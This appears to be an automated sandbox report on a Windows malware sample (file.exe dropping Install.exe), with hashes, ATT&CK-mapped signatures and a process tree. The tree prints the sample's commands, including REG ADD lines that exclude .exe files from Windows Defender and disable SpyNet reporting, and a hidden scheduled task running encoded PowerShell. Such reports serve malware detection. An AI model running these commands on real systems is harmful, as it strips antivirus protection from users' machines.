b6bc391c17a37a17d2be2bcbdfc712602c216af7c2dd5d320f94be5bbc16d7a6

General

Target

file.exe
Size

7.3MB
MD5

83cce075792f5914f1e2bc7004294e13
SHA1

5cb68663c79a606e92bfdca2cbaa559cafb27902
SHA256

b6bc391c17a37a17d2be2bcbdfc712602c216af7c2dd5d320f94be5bbc16d7a6
SHA512

c3d0b81a4234a98b264ea95a0453d2ff85c1e28e4cb3d43f4b12bc88b4091091c78d955eb94621a3605c0c5a19ea5f540aa4749906539e340e281161358d546f
SSDEEP

196608:91ONTzh25zDhTac+XYtC/xUl9q4fZUpmsN0KLJ2:3OXo4otC/g9q4hUpRV2

Score

8^/10

Malware Config

Signatures

Executes dropped EXE 2 IoCs

Processes:

Install.exeInstall.exe

pid process

1276 Install.exe
4016 Install.exe
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.

Query Registry
T1012

System Information Discovery
T1082

Processes:

Install.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

Install.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation Install.exe
Drops file in System32 directory 1 IoCs

Processes:

Install.exe

description ioc process

File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

3196 schtasks.exe

pid	process
1276	Install.exe
4016	Install.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation	Install.exe

description	ioc	process
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe

pid	process
3196	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.EXE

pid process

2264 powershell.EXE
2264 powershell.EXE
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.EXE

description pid process

Token: SeDebugPrivilege 2264 powershell.EXE

pid	process
2264	powershell.EXE
2264	powershell.EXE

description	pid	process
Token: SeDebugPrivilege	2264	powershell.EXE

Suspicious use of WriteProcessMemory 41 IoCs

Processes:

file.exeInstall.exeInstall.exeforfiles.exeforfiles.execmd.execmd.exepowershell.EXE

description	pid	process	target process
PID 964 wrote to memory of 1276	964	file.exe	Install.exe
PID 964 wrote to memory of 1276	964	file.exe	Install.exe
PID 964 wrote to memory of 1276	964	file.exe	Install.exe
PID 1276 wrote to memory of 4016	1276	Install.exe	Install.exe
PID 1276 wrote to memory of 4016	1276	Install.exe	Install.exe
PID 1276 wrote to memory of 4016	1276	Install.exe	Install.exe
PID 4016 wrote to memory of 4480	4016	Install.exe	forfiles.exe
PID 4016 wrote to memory of 4480	4016	Install.exe	forfiles.exe
PID 4016 wrote to memory of 4480	4016	Install.exe	forfiles.exe
PID 4016 wrote to memory of 1032	4016	Install.exe	forfiles.exe
PID 4016 wrote to memory of 1032	4016	Install.exe	forfiles.exe
PID 4016 wrote to memory of 1032	4016	Install.exe	forfiles.exe
PID 4480 wrote to memory of 4100	4480	forfiles.exe	cmd.exe
PID 4480 wrote to memory of 4100	4480	forfiles.exe	cmd.exe
PID 4480 wrote to memory of 4100	4480	forfiles.exe	cmd.exe
PID 1032 wrote to memory of 3944	1032	forfiles.exe	cmd.exe
PID 1032 wrote to memory of 3944	1032	forfiles.exe	cmd.exe
PID 1032 wrote to memory of 3944	1032	forfiles.exe	cmd.exe
PID 4100 wrote to memory of 4328	4100	cmd.exe	reg.exe
PID 4100 wrote to memory of 4328	4100	cmd.exe	reg.exe
PID 4100 wrote to memory of 4328	4100	cmd.exe	reg.exe
PID 3944 wrote to memory of 64	3944	cmd.exe	reg.exe
PID 3944 wrote to memory of 64	3944	cmd.exe	reg.exe
PID 3944 wrote to memory of 64	3944	cmd.exe	reg.exe
PID 4100 wrote to memory of 3136	4100	cmd.exe	reg.exe
PID 4100 wrote to memory of 3136	4100	cmd.exe	reg.exe
PID 4100 wrote to memory of 3136	4100	cmd.exe	reg.exe
PID 3944 wrote to memory of 1304	3944	cmd.exe	reg.exe
PID 3944 wrote to memory of 1304	3944	cmd.exe	reg.exe
PID 3944 wrote to memory of 1304	3944	cmd.exe	reg.exe
PID 4016 wrote to memory of 3196	4016	Install.exe	schtasks.exe
PID 4016 wrote to memory of 3196	4016	Install.exe	schtasks.exe
PID 4016 wrote to memory of 3196	4016	Install.exe	schtasks.exe
PID 4016 wrote to memory of 952	4016	Install.exe	schtasks.exe
PID 4016 wrote to memory of 952	4016	Install.exe	schtasks.exe
PID 4016 wrote to memory of 952	4016	Install.exe	schtasks.exe
PID 2264 wrote to memory of 4496	2264	powershell.EXE	gpupdate.exe
PID 2264 wrote to memory of 4496	2264	powershell.EXE	gpupdate.exe
PID 4016 wrote to memory of 4500	4016	Install.exe	schtasks.exe
PID 4016 wrote to memory of 4500	4016	Install.exe	schtasks.exe
PID 4016 wrote to memory of 4500	4016	Install.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:964

C:\Users\Admin\AppData\Local\Temp\7zS58FD.tmp\Install.exe
.\Install.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1276

C:\Users\Admin\AppData\Local\Temp\7zS6198.tmp\Install.exe
.\Install.exe /S /site_id "525403"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:4016

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
4⤵
- Suspicious use of WriteProcessMemory
PID:4480

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
5⤵
- Suspicious use of WriteProcessMemory
PID:4100

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
6⤵
PID:4328

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
6⤵
PID:3136

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
4⤵
- Suspicious use of WriteProcessMemory
PID:1032

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
5⤵
- Suspicious use of WriteProcessMemory
PID:3944

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
6⤵
PID:64

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
6⤵
PID:1304

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gZqTuqZWf" /SC once /ST 04:37:28 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
4⤵
- Creates scheduled task(s)
PID:3196

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gZqTuqZWf"
4⤵
PID:952

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gZqTuqZWf"
4⤵
PID:4500

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2264

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:4496

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:2260

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:724

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:5104

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

3

T1012

System Information Discovery

4

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7zS58FD.tmp\Install.exe
Filesize
6.3MB

MD5
a35b660762a0c207183dbd2f78012296

SHA1
abd3ff7c687ce038929d427f346ab007c13ee1c0

SHA256
babae7c45ab45def5cc67a09ca46fa300776216899200a91b5117da9407b239f

SHA512
92800c274f6793be68f90dacc1b2b4fcd24fdb3bcbc0862aa8330001a025ec69ca992625b16dacee730979dc33f933dc90427301499e3333ac751c0ad9debdde

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS58FD.tmp\Install.exe
Filesize
6.3MB

MD5
a35b660762a0c207183dbd2f78012296

SHA1
abd3ff7c687ce038929d427f346ab007c13ee1c0

SHA256
babae7c45ab45def5cc67a09ca46fa300776216899200a91b5117da9407b239f

SHA512
92800c274f6793be68f90dacc1b2b4fcd24fdb3bcbc0862aa8330001a025ec69ca992625b16dacee730979dc33f933dc90427301499e3333ac751c0ad9debdde

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS6198.tmp\Install.exe
Filesize
6.8MB

MD5
a37dbf6bceec57a1792cefc8691b4930

SHA1
97a2fd7ba3ff1b231a9f123c5f1e297a6ac7e063

SHA256
edbb320e9e508bfd12f21fd8debe60c1f9b365135fb21d8a6fc767a1a4822efa

SHA512
b6d9a058d336a760c72c51e856d02d5641c412acb4f86e8c9da610256bb39910df300d440c07cbca4bb953e939155e0ad9a494eb667c87d2a45d783dfa498d77

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS6198.tmp\Install.exe
Filesize
6.8MB

MD5
a37dbf6bceec57a1792cefc8691b4930

SHA1
97a2fd7ba3ff1b231a9f123c5f1e297a6ac7e063

SHA256
edbb320e9e508bfd12f21fd8debe60c1f9b365135fb21d8a6fc767a1a4822efa

SHA512
b6d9a058d336a760c72c51e856d02d5641c412acb4f86e8c9da610256bb39910df300d440c07cbca4bb953e939155e0ad9a494eb667c87d2a45d783dfa498d77

Download Submit
memory/64-146-0x0000000000000000-mapping.dmp

Download
memory/952-150-0x0000000000000000-mapping.dmp

Download
memory/1032-142-0x0000000000000000-mapping.dmp

Download
memory/1276-132-0x0000000000000000-mapping.dmp

Download
memory/1304-148-0x0000000000000000-mapping.dmp

Download
memory/2264-154-0x00007FFA60C80000-0x00007FFA61741000-memory.dmp

Filesize
10.8MB

Download
memory/2264-151-0x00007FFA60C80000-0x00007FFA61741000-memory.dmp

Filesize
10.8MB

Download
memory/2264-152-0x000002095FE00000-0x000002095FE22000-memory.dmp

Filesize
136KB

Download
memory/3136-147-0x0000000000000000-mapping.dmp

Download
memory/3196-149-0x0000000000000000-mapping.dmp

Download
memory/3944-144-0x0000000000000000-mapping.dmp

Download
memory/4016-138-0x0000000010000000-0x0000000010D2B000-memory.dmp

Filesize
13.2MB

Download
memory/4016-135-0x0000000000000000-mapping.dmp

Download
memory/4100-143-0x0000000000000000-mapping.dmp

Download
memory/4328-145-0x0000000000000000-mapping.dmp

Download
memory/4480-141-0x0000000000000000-mapping.dmp

Download
memory/4496-153-0x0000000000000000-mapping.dmp

Download
memory/4500-155-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads